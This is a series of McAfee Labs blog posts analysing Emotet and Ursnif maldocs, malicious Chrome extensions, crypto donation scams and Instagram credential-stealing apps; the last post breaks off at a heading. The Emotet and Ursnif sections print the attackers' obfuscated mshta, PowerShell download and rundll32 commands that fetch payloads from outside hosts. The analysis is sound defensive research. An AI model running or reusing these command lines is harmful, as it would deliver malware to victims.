Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Threat Summary

1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT	OBFUSCATED CMD	DEOBFUSCATED CMD
Hexadecimal	cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html	http://185[.]7[.]214[.]7/fer/fer.html
Octal	cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html	http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line

(New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line

cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE	VALUE	SCANNER	DETECTION NAME
XLS	06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c	McAfee LiveSafe and Total Protection	X97M/Downloader.nn
DLL	a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3	McAfee LiveSafe and Total Protection	Emotet-FSY
HTML URL	http://185[.]7[.]214[.]7/fer/fer.html http://46[.]105[.]81[.]76/c.html	WebAdvisor	Blocked
DLL URL	http://185[.]7[.]214[.]7/fer/fer.png http://46[.]105[.]81[.]76/cc.png	WebAdvisor	Blocked

MITRE ATT&CK

TECHNIQUE ID	TACTIC	TECHNIQUE DETAILS	DESCRIPTION
T1566	Initial access	Phishing attachment	Initial maldoc uses phishing strings to convince users to open the maldoc
T1204	Execution	User Execution	Manual execution by user
T1071	Command and Control	Standard Application Layer Protocol	Attempts to connect through HTTP
T1059	Command and Scripting Interpreter	Starts CMD.EXE for commands execution	Excel uses cmd and PowerShell to execute command
T1218	Signed Binary Proxy Execution	Uses RUNDLL32.EXE and MSHTA.EXE to load library	rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Authored by Oliver Devane and Vallabh Chole  

Notifications on Chrome and Edge, both desktop browsers, are commonplace, and malicious actors are increasingly abusing this feature. McAfee previously blogged about how to change desktop browser settings to stop malicious notifications. This blog focuses on Chrome notifications on Android mobile devices such as phones and tablets, and how McAfee Mobile Security protects users from malicious sites leveraging these notifications.  

Where do these notifications come from? 

Most users are unaware of the source of these notifications. Permission is granted when a user clicks ‘Allow’ on a prompt within Android Chrome. 

Many malicious websites use language and images like the one above that entice the user to click ‘Allow’ such as ‘Just one more step! Click “Allow” to continue. Once allow is clicked, the website is added to a site permissions list, which will enable it to send notifications.  

What do they look like? 

The notifications will look like a usual Android notification which you will be used to seeing such as you have a new WhatsApp message or email. To identify the source of the notification, we need to look for the application name which is like the one highlighted in the red box below.  

The image above shows the notification came from Chrome and it is from the website premiumbros[.]com. This is something you should pay attention to as it will be needed when you want to stop annoying notifications.  

Why are some of them malicious? 

Some notifications like the ones in this blog are malicious as they attempt to trick users into believing that their mobile device is infected with a virus and some action is required. When the users click the notification, Chrome will load a website which will present them with a fake warning like the example below: 

Clicking either Cancel or Update Now on the above website will result in the same behavior. The browser will redirect the user to a google play store app so that they can download and install it.  

The malicious websites will flood your phone with several notifications. The screenshot below shows an example of this: 

Why do malicious actors do this? 

You may ask yourself, why do malicious actors try to get me to install a google play application? The people behind these scams receive a commission when these applications are installed on devices. They rely on deceptive tactics to trick users into installing them to maximize profits. 

How can I remove notifications? 

To remove a website’s notification permission, you need to change a Chrome setting. 

1- Find out the name of the website which is sending these notifications. This can be done by looking at the notification and noting down the name of the website. If we use this blog as an example, it would be premiumbros[.]com

2- Open the Chrome browser app which can be found by performing the following search: 

3- Click the three … on the top right hand of the application 

4- Scroll down and click on settings 

5- Click on Notifications 

6- Scroll down until you find the website which you identified in step 1 

7- Pres the blue radio button so it turns grey 

8- Notifications will now be disabled for that website. If you want to block multiple websites, click the radio button for them as well.  

How does McAfee Protect me? 

McAfee customers who have McAfee Mobile Security are protected against these malicious websites as long as they enable the ‘Safe Browsing’ feature within the application.  

Upon trying to access a malicious website such as the one in the blog it will be blocked as shown in the image below: 

 

Please read this guide on enabling the Safe Browsing feature within the Mobile Security Application. 

The post Why Am I Getting All These Notifications on my Phone? appeared first on McAfee Blog.

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi 

McAfee has recently observed several malicious Chrome Extensions which, once installed, will redirect users to phishing sites, insert Affiliate IDs and modify legitimate websites to exfiltrate personally identifiable information (PII) data. According to the Google Extension Chrome Store, the combined install base is 100,000 

McAfee Labs has observed these extensions are prevalent in USA, Europe and India as we can observe in the heatmap below. 

The perpetrator targets over 1,400 domains, where 100 of them belong to the top 10,000 Alexa ranking including hbomax.com, hotels.com and expedia.com.

One extension, ‘Netflix Party’, mimics the original Netflix Party extension, which allows groups of people to watch Netflix shows at the same time. However, this version monitors all the websites you visit and performs several malicious activities.  

The malicious actor behind the extensions has created several Twitter accounts and fake review websites to deceive users into trusting and installing the extensions. 

The victim will be tricked into installing the extension and their data will be stolen when browsing a gift card site.  

The details of each step are as follows: 

1. The perpetrator creates malicious extensions and adds them to the Chrome Extension Store. They create fake websites to review the extensions and fake Twitter accounts to publicize them.  
2. A victim may perform a web or Twitter search for Netflix Party, read the review and click on a link that will lead them to the Google Chrome Store.  
3. They click to install the Extension and accept the permissions. 
4. The victim will either perform a web search or directly navigate to the gift card website. The Extension will identify the website and redirect them to the phishing page. 
5. The victim will enter their gift card information on the phishing page. 
6. The gift card information is posted to the server to which the malicious actor has access. They can now use or sell the stolen data and the victim will lose their funds. 

Technical Analysis 

This section contains the technical analysis of the malicious chrome extension “bncibciebfeopcomdaknelhcohiidaoe“. 

Manifest.json 

The manifest.json file contains the permissions of the extension. The ‘unsafe-eval’ permission in the ‘content_security_policy’ and the allowed use of content.js on any website visited by the user is of particular concern 

Background.js 

When the extension is installed, the background.js script will be loaded. This file uses a simple obfuscation technique of putting all the code on one line which makes it difficult to read. This is easily cleaned up by using a code beautifier and the image below shows the obfuscated script on the first line and the cleaned-up code below the red arrow.  

This script accesses https://accessdashboard[.]live to download a script and store it as variable ‘code’ in Chrome’s local storage. This stored variable is then referenced in the content.js script, which is executed on every visited website.  

Content.js 

After beautification, we see the code will read the malicious script from the ‘code’ variable which was previously stored. 

‘Code’  

The malicious code has three main functions, redirection for phishing, modifying of cookies to add AffiliateIDs, and modifying of website code to add chat windows.  

Redirection for Phishing 

Redirection for phishing works by checking if the URL being accessed matches a list, and conditionally redirects to a malicious IP that hosts the phishing site.  

URLs monitored are: 

• https[:]//www.target.com/guest/gift-card-balance 
• https[:]//www.macys.com/account/giftcardbalance 
• https[:]//www.nike.com/orders/gift-card-lookup 
• https[:]//www.nordstrom.com/nordstrom-gift-cards 
• https[:]//www.sephora.com/beauty/giftcards 
• https[:]//www.sephoragiftcardbalance.com 
• https[:]//balance.amexgiftcard.com 
• https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retail%20sales%20channel 
• https[:]//amexprepaidcard.com 
• [:]//secure4.store.apple.com/shop/giftcard/balance 

Upon navigating to one of the above sites, the user will be redirected to 164[.]90[.]144[.]88. An observant user would notice that the URL would have changed to an IP address, but some users may not. 

The image below shows the Apple Phishing site and the various phishing kits being hosted on this server. 

The phishing sites share similar codes. If a user enters their gift card information, the data will be posted to 52.8.106.52. A network capture of the post request is shown below: 

Modifying of cookies to add AffiliateIDs 

The second malicious function contains AIPStore which is a dictionary containing a list of URLs and their respective monetizing sites which provide affiliate IDs. This function works by loading new tabs which will result in cookies being set on the visited sites. The flow below describes how the extension will work. 

1. A user navigates to a retail website 
2. If the retail website is contained in the AIPStore keymap, the extension will load a new tab with a link to a monetizing site which sets the cookie with the affiliate ID. The new tab is then closed, and the cookie will persist.  
3. The user will be unaware that a cookie would have been set and they will continue to browse the website. 
4. Upon purchasing any goods, the Affiliate ID will be recognized by the site vendor and commission will be sent to the Affiliate ID owner which would be the Malicious Actor 

The left image below shows the original site with no affiliate cookie, the one on the right highlights the cookie that has been added by the extension. 

Chat Windows 

The final function checks a list of URLs being accessed and if they match, a JS script will be injected into the HTML code which will result in a chat window being displayed. The image below shows the injected script and the chat window. 

The chat window may be used by the malicious actor to request PII data, credit card, and product key information. 

Conclusion 

This threat is a good example of the lengths malicious actors will go to trick users into installing malware such as creating Twitter accounts and fake review websites.  

McAfee advises its customers to be cautious when installing Chrome Extensions and pay attention to the permissions that they are requesting.  

The permissions will be shown by Chrome before the installation of the Extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog 

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.  

The Malicious code within the extension is detected as Phish-Extension. Please perform a ‘Full’ scan via the product. 

Type	Value	Product	Detected
URL – Phishing Sites	164.90.141.88/*	McAfee WebAdvisor	Blocked
Chrome Extension	netflix-party – bncibciebfeopcomdaknelhcohiidaoe	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	teleparty – flddpiffdlibegmclipfcnmaibecaobi	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	private-watch-party – maolinhbkonpckjldhnocgilkabpfodc	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	blocksite – pfhjfcifolioiddfgicgkapbkfndaodc	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd	Total Protection and LiveSafe	Phish-Extension
Chrome Extension	ott-party – lldibibpehfomjljogedjhaldedlmfck	Total Protection and LiveSafe	Phish-Extension

 

 

The post Imposter Netflix Chrome Extension Dupes 100k Users appeared first on McAfee Blog.

Authored by Vallabh Chole and Oliver Devane

Scammers are very quick at reacting to current events, so they can generate ill-gotten gains. It comes as no surprise that they exploited the current events in Ukraine, and when the Ukrainian Twitter account tweeted Bitcoin and Ethereum wallet addresses for donations we knew that scammers would use this as a lure for their victims.

This blog covers some of the malicious sites and emails McAfee has observed in the past few weeks.

Crypto wallet donation scams

A crypto donation scam occurs when perpetrators create phishing websites and emails that contain cryptocurrency wallets asking for donations. We have observed several new domains being created which perform this malicious activity, such as ukrainehelp[.]world and ukrainethereum[.]com.

Ukrainhelp[.]world

Below is a screenshot of Ukrainehelp[.]world, which is a phishing site asking for crypto donations for UNICEF. The website contains the BBC logo and several crypto wallet addresses.

While investigating this site, we observed that the Ethereum wallet used use was also associated with an older crypto scam site called eth-event20.com. The image below shows the current value of the crypto wallet which is worth $114,000. Interestingly this wallet transfers all its coins to 0xc95eb2aa75260781627e7171c679a490e2240070 which in turn transfers to 0x45fb09468b17d14d2b9952bc9dcb39ee7359e64d. The final wallet currently has 313 ETH which is worth over $850,000. This shows the large sums of money scammers can generate with phishing sites.

Ukrainethereum[.]com

Ukrainethereum[.]com is another crypto scam site, but what makes this one interesting is the features it contains to gain the victim’s confidence in trusting the website such as a fake chatbox and a fake donation verifier.

Fake Chat

The image above shows the chatbox on the left-hand side which displays several messages. At first glance, it would appear as if other users are on the website and talking, but when you reload the site it shows the same messages. This is due to the chat messages being displayed from a list that is used to populate the website with JavaScript code as shown on the right-hand side.  

Fake Donation Verifier 

The site contains a donation checker so the victim can see if their donation was received, as shown below. 

 

1. The first image on left shows the verification box for donation to check if it is completed or not 
2. Upon clicking ‘Check’ the victim is shown a message to say the donation was received.  
3. What occurs, is upon clicking ‘Check’ the JavaScript code changes the website code so that it displays the ‘Thanks!’ message, and no actual check is performed. 

Phishing Email 

The following image shows one of the examples of phish emails we have observed. 

The email is not addressed to anyone specifically as they are mass-mailed to multiple email addresses. The wallet IDs in the email are not associated with the official Ukraine Twitter and are owned by scammers. As you can see in the image above, they are similar as the first 3 characters are the same. This could lead to some users believing it is legitimate. Therefore, it’s important to check that the wallet address is identical.  

Credit Card Information Stealer 

This is the most common type of phishing website. The goal of these sites it entices the victim into entering their credit card and personally identifiable information (PII) data by making them believe that the site being visited is official. This section contains details on one such website we have found using Ukraine donations as a lure.  

Razonforukrain[.]com 

The image below shows the phishing site. The website was used to save the children’s NGO links and images, which made it appear more genuine. You can see that is it asking the victim to enter their credit card and billing information.  

Once the data is entered, and the victim clicks on ‘Donate’, the information will be submitted via the form and will be sent to scammers so they can then use or sell the information. 

We observed that a few days after the website was created, the scammers change the site code so that it became a Mcdonald’s phishing site targeting the Arab Emirates. This was a surprising change in tactics. 

The heatmap below shows the detections McAfee has observed around the world for the malicious sites mentioned in this blog. 

Conclusion 

How to identify a phishing email? 

• Look for the domain from where you received mail, attackers masquerade it. 
• Use McAfee Web Advisor as this prevents you from accessing malicious sites 
• If McAfee Web Advisor is not used, links can be manually checked at https://trustedsource.org/. 
• Perform a Web Search of any crypto wallet addresses. If the search returns no or a low number of hits it is likely fraudulent. 
• Check for poor grammar and suspicious logos  
• For more detailed advice please visit McAfee’s How to recognize and protect yourself from phishing page 

How to identify phishing websites? 

• Use McAfee Web Advisor as this prevents you from accessing malicious sites 
• Look at the URL of the website which you are visiting and make sure it is correct. Look for alterations such as logln-paypal.com instead of login.paypal.com 
• If you are unsure that the website is legitimate. Perform a Web search of the URL. You will find many results If they are genuine. If the search returns no or a low number of hits it is likely fraudulent 
• Hyperlinks and site addresses that do not match the sender – Hover your mouse over the hyperlink or call-to-action button in the email. Is the address shortened or is it different from what you would expect from the sender? It may be a spoofed address from the 
• Verify if the URL and Title of the page match. Such as the website, razonforukraine[.]com with a title reading “McDonald’s Delivery” 

For general cyber scam, education click here

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor 

 

Type	Value	Product	Detected
URL – Phishing Sites	ukrainehelp[.]world	McAfee WebAdvisor	Blocked
URL – Phishing Sites	ukrainethereum[.]com	McAfee WebAdvisor	Blocked
URL – Phishing Sites	unitedhelpukraine[.]kiev[.]ua/	McAfee WebAdvisor	Blocked
URL – Phishing Sites	donationukraine[.]io/donate	McAfee WebAdvisor	Blocked
URL – Phishing Sites	help-ukraine-compaign[.]com/shop	McAfee WebAdvisor	Blocked
URL – Phishing Sites	ukrainebitcoin[.]online/	McAfee WebAdvisor	Blocked
URL – Phishing Sites	ukrainedonation[.]org/donate	McAfee WebAdvisor	Blocked
URL – Phishing Sites	ukrainewar[.]support	McAfee WebAdvisor	Blocked
URL – Phishing Sites	sendhelptoukraine[.]com	McAfee WebAdvisor	Blocked
URL – Phishing Sites	worldsupportukraine[.]com	McAfee WebAdvisor	Blocked
URL – Phishing Sites	paytoukraine[.]space	McAfee WebAdvisor	Blocked
URL – Phishing Sites	razonforukraine[.]com	McAfee WebAdvisor	Blocked

 

The post Scammers are Exploiting Ukraine Donations appeared first on McAfee Blog.

By Oliver Devane 

Update: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  

We identified several different streams occurring at a similar same time. The images of some are shown below: 

The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the site‘s frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site	Crypto Type	Wallet	Value as on 5PM UTC 5th May 2022
22ark-invest[.]org	ETH	0x820a78D8e0518fcE090A9D16297924dB7941FD4f	$25,726.46
22ark-invest[.]org	BTC	1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE	$29,863.78
2xEther[.]com	ETH	0x5081d1eC9a1624711061C75dB9438f207823E694	$2,748.50
2x-musk[.]net	ETH	0x18E860308309f2Ab23b5ab861087cBd0b65d250A	$10,409.13
2x-musk[.]net	BTC	17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9	$4,779.47
arkinvest22[.]net	ETH	0x2605dF183743587594A3DBC5D99F12BB4F19ac74	$11,810.57
arkinvest22[.]net	BTC	1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha	$5,976.80
doublecrypto22[.]com	ETH	0x12357A8e2e6B36dd6D98A2aed874D39c960eC174	$0.00
doublecrypto22[.]com	BTC	1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY	$0.00
elonnew[.]com	ETH	0xAC9275b867DAb0650432429c73509A9d156922Dd	$0.00
elonnew[.]com	BTC	1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu	$0.00
elontoday[.]org	ETH	0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4	$18,442.96
elontoday[.]org	BTC	bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5	$0.00
Teslabtc22[.]com	ETH	0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0	$27,386.69
Teslabtc22[.]com	BTC	18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK	$17,609.62
tesla-eth[.]org	ETH	0x436F1f89c00f546bFEf42F8C8d964f1206140c64	$5,841.84
tesla-eth[.]org	BTC	1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW	$132.22
teslaswell[.]com	ETH	0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D	$9.43
teslaswell[.]com	BTC	bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v	$0.00
twittergive[.]net	ETH	0xB8e257C18BbEC93A596438171e7E1E77d18671E5	$25,918.90
twittergive[.]net	BTC	1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T	$99,123.42

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type	Value	Product	Blocked
URL – Crypto Scam	twittergive[.]net	McAfee WebAdvisor	YES
URL – Crypto Scam	tesla-eth[.]org	McAfee WebAdvisor	YES
URL – Crypto Scam	22ark-invest[.]org	McAfee WebAdvisor	YES
URL – Crypto Scam	2xEther[.]com	McAfee WebAdvisor	YES
URL – Crypto Scam	Teslabtc22[.]com	McAfee WebAdvisor	YES
URL – Crypto Scam	elontoday[.]org	McAfee WebAdvisor	YES
URL – Crypto Scam	elonnew[.]com	McAfee WebAdvisor	YES
URL – Crypto Scam	teslaswell[.]com	McAfee WebAdvisor	YES
URL – Crypto Scam	2x-musk[.]net	McAfee WebAdvisor	YES
URL – Crypto Scam	doublecrypto22[.]com	McAfee WebAdvisor	YES
URL – Crypto Scam	arkinvest22[.]net	McAfee WebAdvisor	YES

 

The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

Authored by Jyothi Naveen and Kiran Raj

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible.

A recent spam campaign was using malicious word documents to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server.

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan.

Threat Summary

• The initial attack vector is a phishing email with a Microsoft Word document attachment.
• Upon opening the document, VBA executes a malicious shellcode
• Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it.

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe

Word Analysis

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.

VBA Macro Analysis of Word Document

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors..

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below.

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

The shellcode is written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

URL	hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/
CMD	rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer

After successful execution of the shellcode, the environment variable is removed. 

IOC 

TYPE	VALUE	PRODUCT	DETECTION NAME
Main Word Document	6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f	McAfee LiveSafe and Total Protection	X97M/Downloader.CJG
Downloaded dll	41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547	McAfee LiveSafe and Total Protection	Ursnif-FULJ
URL to download dll	hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/	WebAdvisor	Blocked

MITRE Attack Framework 

Technique ID	Tactic	Technique Details	Description
T1566.001	Initial Access	Spear phishing Attachment	Manual execution by user
T1059.005	Execution	Visual Basic	Malicious VBA macros
T1218.011	Defense Evasion	Signed binary abuse	Rundll32.exe is used
T1027	Defense Evasion	Obfuscation techniques	VBA and powershell base64 executions
T1086	Execution	Powershell execution	PowerShell command abuse

 Conclusion 

Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Phishing Campaigns featuring Ursnif Trojan on the Rise appeared first on McAfee Blog.

Authored by Dexter Shin 

McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase their followers or likes in the last post. As we researched more about this threat, we found another malware type that uses different technical methods to steal user’s credentials. The target is users who are not satisfied with the default functions provided by Instagram. Various Instagram modification application already exists for those users on the Internet. The new malware we found pretends to be a popular mod app and steals Instagram credentials. 

Behavior analysis 

Instander is one of the famous Instagram modification applications available for Android devices to help Instagram users access extra helpful features. The mod app supports uploading high-quality images and downloading posted photos and videos. 

The initial screens of this malware and Instander are similar, as shown below. 

Figure 1. Instander legitimate app(Left) and Mmalware(Right) 

Next, this malware requests an account (username or email) and password. Finally, this malware displays an error message regardless of whether the login information is correct. 

Figure 2. Malware requests account and password 

The malware steals the user’s username and password in a very unique way. The main trick is to use the Firebase API. First, the user input value is combined with [email protected]. This value and static password(=kamalw20051) are then sent via the Firebase API, createUserWithEmailAndPassword. And next, the password process is the same. After receiving the user’s account and password input, this malware will request it twice. 

Since we cannot see the dashboard of the malware author, we tested it using the same API. As a result, we checked the user input value in plain text on the dashboard. 

According to the Firebase document, createUserWithEmailAndPassword API is to create a new user account associated with the specified email address and password. Because the first parameter is defined as email patterns, the malware author uses the above code to create email patterns regardless of user input values. 

It is an API for creating accounts in the Firebase so that the administrator can check the account name in the Firebase dashboard. The victim’s account and password have been requested as Firebase account name, so it should be seen as plain text without hashing or masking. 

Network traffic 

As an interesting point on the network traffic of the malware, this malware communicates with the Firebase server in Protobuf format in the network. The initial configuration of this Firebase API uses the JSON format. Although the Protobuf format is readable enough, it can be assumed that this malware author intentionally attempts to obfuscate the network traffic through the additional settings. Also, the domain used for data transfer(=www.googleapis.com) is managed by Google. Because it is a domain that is too common and not dangerous, many network filtering and firewall solutions do not detect it. 

Conclusion 

As mentioned, users should always be careful about installing 3rd party apps. Aside from the types of malware we’ve introduced so far, attackers are trying to steal users’ credentials in a variety of ways. Therefore, you should employ security software on your mobile devices and always keep up to date. 

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information visit  McAfee Mobile Security 

Indicators of Compromise 

SHA256: 

• 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39 

The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog.

Authored by Dexter Shin 

Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users are looking to increase their follower numbers, as this has become a symbol of a person’s popularity.  Instagram’s large user base has not gone unnoticed to cybercriminals. McAfee’s Mobile Research Team recently found new Android malware disguised in an app to increase Instagram followers. 

How can you increase your followers or likes? 

You can easily find apps on the internet that increase the number of Instagram followers. Some of these apps require both a user account and a password. Other types of apps only need the user to input their user account. But are these apps safe to use? 

Many YouTubers explain how to use these apps with tutorial videos. They log into the app with their own account and show that the number of followers is increasing. Among the many videos, the domain that appears repeatedly was identified. 

The way the domain introduces is very simple. 

1. Log in with user account and password. 
2. Check credentials via Instagram API. 
3. After logging in, the user can enjoy many features provided by the app. (free followers, free likes, unlimited comments, etc.) 
4. In the case of free followers, the user needs to input how many followers they want to gain.  

When you run the function, you can see that the number of followers increases every few seconds. 

How does this malware spread? 

Some Telegram channels are promoting YouTube videos with domain links to the malware. 

We have also observed a video from a famous YouTuber with over 190,000 subscribers promoting a malicious app. However, in the video, we found some concerning comments with people complaining that their credentials were being stolen. 

Behavior Analysis in Malware 

We analyzed the application that is being promoted by the domain. The hidden malware does not require many permissions and therefore does not appear to be harmful. When users launch the app, they can only see the below website via the Android Webview.  

After inspecting the app, we observe the initial code does not contain many features. After showing an advertisement, it will immediately show the malicious website. Malicious activities are performed at the website’s backend rather than within the Android app. 

The website says that your transactions are carried out using the Instagram API system with your username and password. It is secure because they use the user’s credentials via Instagram’s official server, not their remote server. 

Contrary to many people’s expectations, we received abnormal login attempts from Turkey a few minutes after using the app. The device logged into the account was not an Instagram server but a personal device model of Huawei as LON-L29. 

As shown above, they don’t use an Instagram API. In addition, as you request followers, the number of the following also increases. In other words, the credentials you provided are used to increase the number of followers of other requesters. Everyone who uses this app has a relationship with each other. Moreover, they will store and use your credentials in their database without your acknowledgement. 

How many users are affected? 

